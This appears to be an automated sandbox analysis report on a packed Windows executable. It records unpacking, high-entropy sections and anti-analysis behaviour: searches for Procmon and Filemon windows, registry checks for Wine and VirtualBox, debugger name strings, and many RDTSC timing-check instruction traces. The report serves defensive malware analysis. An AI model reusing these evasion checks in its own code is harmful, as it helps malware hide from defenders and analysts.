Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: kernel.appcore.dllJump to behavior
Source: 2OJYjm4J1B.exeStatic file information: File size 4456448 > 1048576
Source: 2OJYjm4J1B.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: 2OJYjm4J1B.exeStatic PE information: Raw size of oshltrdl is bigger than: 0x100000 < 0x1b8e00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeUnpacked PE file: 0.2.2OJYjm4J1B.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oshltrdl:EW;ifmqqwjz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oshltrdl:EW;ifmqqwjz:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: 2OJYjm4J1B.exeStatic PE information: real checksum: 0x444de7 should be: 0x44168a
Source: 2OJYjm4J1B.exeStatic PE information: section name:
Source: 2OJYjm4J1B.exeStatic PE information: section name: .idata
Source: 2OJYjm4J1B.exeStatic PE information: section name:
Source: 2OJYjm4J1B.exeStatic PE information: section name: oshltrdl
Source: 2OJYjm4J1B.exeStatic PE information: section name: ifmqqwjz
Source: 2OJYjm4J1B.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF50 push eax; iretd 0_3_0150CF51
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF50 push eax; iretd 0_3_0150CF51
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF54 push eax; iretd 0_3_0150CF55
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF54 push eax; iretd 0_3_0150CF55
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150B534 push ds; retf 0001h0_3_0150B5E9
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150B534 push ds; retf 0001h0_3_0150B5E9
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_01515BD2 push eax; retf 0000h0_3_01515BD3
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_01508DE2 pushad ; iretd 0_3_01508E89
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_01508DE2 pushad ; iretd 0_3_01508E89
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF50 push eax; iretd 0_3_0150CF51
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF50 push eax; iretd 0_3_0150CF51
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF54 push eax; iretd 0_3_0150CF55
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF54 push eax; iretd 0_3_0150CF55
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150B534 push ds; retf 0001h0_3_0150B5E9
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150B534 push ds; retf 0001h0_3_0150B5E9
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_01515BD2 push eax; retf 0000h0_3_01515BD3
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_01508DE2 pushad ; iretd 0_3_01508E89
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_01508DE2 pushad ; iretd 0_3_01508E89
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF50 push eax; iretd 0_3_0150CF51
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF50 push eax; iretd 0_3_0150CF51
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF54 push eax; iretd 0_3_0150CF55
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF54 push eax; iretd 0_3_0150CF55
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150B534 push ds; retf 0001h0_3_0150B5E9
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150B534 push ds; retf 0001h0_3_0150B5E9
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_01515BD2 push eax; retf 0000h0_3_01515BD3
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_01508DE2 pushad ; iretd 0_3_01508E89
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_01508DE2 pushad ; iretd 0_3_01508E89
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF50 push eax; iretd 0_3_0150CF51
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF50 push eax; iretd 0_3_0150CF51
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF54 push eax; iretd 0_3_0150CF55
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF54 push eax; iretd 0_3_0150CF55
Source: 2OJYjm4J1B.exeStatic PE information: section name: oshltrdl entropy: 7.955137749688428

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AE4A84 second address: AE4A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AE4A88 second address: AE4A98 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA6CD35B916h 0x00000008 jbe 00007FA6CD35B916h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AE4A98 second address: AE4AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FA6CC859EC6h 0x00000009 js 00007FA6CC859EC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF354B second address: AF3557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6CD35B916h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF3988 second address: AF39E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CC859ED0h 0x00000009 jmp 00007FA6CC859ED9h 0x0000000e popad 0x0000000f jne 00007FA6CC859EDBh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA6CC859ECDh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF39E2 second address: AF39E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF39E6 second address: AF39EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF3DE6 second address: AF3DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA6CD35B916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF3DF0 second address: AF3E24 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6CC859EC6h 0x00000008 jnc 00007FA6CC859EC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edi 0x00000014 push edi 0x00000015 jmp 00007FA6CC859ECCh 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jg 00007FA6CC859EC6h 0x00000023 jmp 00007FA6CC859ECAh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF3E24 second address: AF3E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF3E28 second address: AF3E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF3E2E second address: AF3E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF3E39 second address: AF3E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FA6CC859ED8h 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA6CC859ED9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF6504 second address: AF650A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF650A second address: AF650E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF6547 second address: AF654C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF654C second address: AF6589 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6CC859EC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007FA6CC859ECAh 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 nop 0x00000018 jmp 00007FA6CC859ECDh 0x0000001d mov edi, dword ptr [ebp+122D38DCh] 0x00000023 push 00000000h 0x00000025 mov dh, 09h 0x00000027 mov cx, si 0x0000002a push 068A001Ah 0x0000002f push eax 0x00000030 push edx 0x00000031 push edx 0x00000032 push esi 0x00000033 pop esi 0x00000034 pop edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF674E second address: AF6763 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA6CD35B916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF6763 second address: AF6767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF6767 second address: AF676D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF676D second address: AF6824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FA6CC859EC8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov ecx, edi 0x00000026 push 00000003h 0x00000028 xor esi, 207F9A24h 0x0000002e push 00000000h 0x00000030 mov dl, bh 0x00000032 push 00000003h 0x00000034 sbb ecx, 364100E2h 0x0000003a push F624C476h 0x0000003f jne 00007FA6CC859EDAh 0x00000045 xor dword ptr [esp], 3624C476h 0x0000004c mov dword ptr [ebp+122D2A74h], edi 0x00000052 lea ebx, dword ptr [ebp+1244A437h] 0x00000058 sub edx, dword ptr [ebp+122D380Ch] 0x0000005e xchg eax, ebx 0x0000005f jno 00007FA6CC859ED8h 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 je 00007FA6CC859ED9h 0x0000006e jmp 00007FA6CC859ED3h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF68BF second address: AF68C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF68C3 second address: AF6946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jg 00007FA6CC859ECCh 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b ja 00007FA6CC859ED8h 0x00000021 jmp 00007FA6CC859ED2h 0x00000026 popad 0x00000027 mov eax, dword ptr [eax] 0x00000029 pushad 0x0000002a pushad 0x0000002b jmp 00007FA6CC859ED3h 0x00000030 je 00007FA6CC859EC6h 0x00000036 popad 0x00000037 push eax 0x00000038 jmp 00007FA6CC859ECBh 0x0000003d pop eax 0x0000003e popad 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AF6946 second address: AF69AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B91Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007FA6CD35B916h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 popad 0x00000014 pop eax 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FA6CD35B918h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f and edi, 6E82F803h 0x00000035 push 00000003h 0x00000037 mov dword ptr [ebp+122D2AEEh], ecx 0x0000003d push 00000000h 0x0000003f mov ecx, eax 0x00000041 push 00000003h 0x00000043 xor esi, dword ptr [ebp+122D393Ch] 0x00000049 push CDAECD92h 0x0000004e jc 00007FA6CD35B91Eh 0x00000054 push ecx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B09500 second address: B09504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AE145D second address: AE1478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA6CD35B925h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AE1478 second address: AE1481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B15E03 second address: B15E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B15E09 second address: B15E19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECBh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B15E19 second address: B15E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B15E21 second address: B15E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FA6CC859ED7h 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B15E48 second address: B15E52 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA6CD35B916h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B15F73 second address: B15F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B160DC second address: B160F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FA6CD35B91Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FA6CD35B916h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B160F9 second address: B160FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B160FD second address: B16114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B920h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16114 second address: B1611A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B1611A second address: B16145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B927h 0x00000009 jnc 00007FA6CD35B916h 0x0000000f popad 0x00000010 pushad 0x00000011 jg 00007FA6CD35B916h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16275 second address: B16281 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007FA6CC859EC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16281 second address: B1628D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6CD35B91Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B1640A second address: B16414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA6CC859EC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16414 second address: B1641A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16572 second address: B1658F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FA6CC859ED6h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B168A6 second address: B168C3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA6CD35B916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6CD35B91Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B168C3 second address: B168C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B168C7 second address: B168CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B168CB second address: B168D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B168D5 second address: B168F7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA6CD35B916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FA6CD35B922h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B168F7 second address: B168FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B168FB second address: B16905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16905 second address: B1690F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA6CC859EC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B1690F second address: B16913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16913 second address: B16924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007FA6CC859EC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16924 second address: B16942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6CD35B916h 0x0000000a jmp 00007FA6CD35B91Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16942 second address: B16948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16BC3 second address: B16BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16BC9 second address: B16BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
